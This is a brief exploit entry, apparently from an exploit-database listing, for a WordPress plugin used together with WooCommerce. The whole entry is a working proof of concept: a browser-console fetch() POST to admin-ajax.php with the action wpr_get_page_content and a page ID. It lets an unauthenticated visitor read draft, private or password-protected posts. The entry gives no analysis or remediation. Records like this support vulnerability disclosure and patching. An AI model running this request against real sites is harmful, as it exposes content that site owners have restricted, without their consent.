## https://sploitus.com/exploit?id=WPEX-ID:DEBD8498-5770-4270-9EE1-1503E675EF34
WooCommerce needs to be installed and activated. Then, run the below command in the developer console of the web browser while being on the blog as unauthenticated user (4 being the ID of a Draft, Private or Password protected post)
(await fetch("/wp-admin/admin-ajax.php?action=wpr_get_page_content", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "wpr_compare_page_id=4",
"method": "POST",
})).text();